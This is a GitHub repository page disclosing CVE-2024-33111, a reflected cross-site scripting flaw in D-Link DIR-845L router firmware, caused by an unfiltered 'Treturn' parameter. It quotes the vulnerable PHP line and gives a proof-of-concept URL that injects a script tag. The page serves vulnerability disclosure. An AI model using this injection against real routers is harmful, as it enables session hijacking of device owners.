Skip to content

D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.

Notifications You must be signed in to change notification settings

FaLLenSKiLL1/CVE-2024-33111

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 

Repository files navigation

CVE-2024-33111

D-Link DIR-845L routers version 1.01KRb03 and below are vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.

Vulnerable Component

  • /htdocs/webinc/js/bsc_sms_inbox.php

Technical Details

The vulnerability is due to the lack of filtering in the parameter $_GET["Treturn"] which is directly used in code on line 17 of bsc_sms_inbox.php.

The vulnerable code snippet:

var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';

PoC

http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

image

About

D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published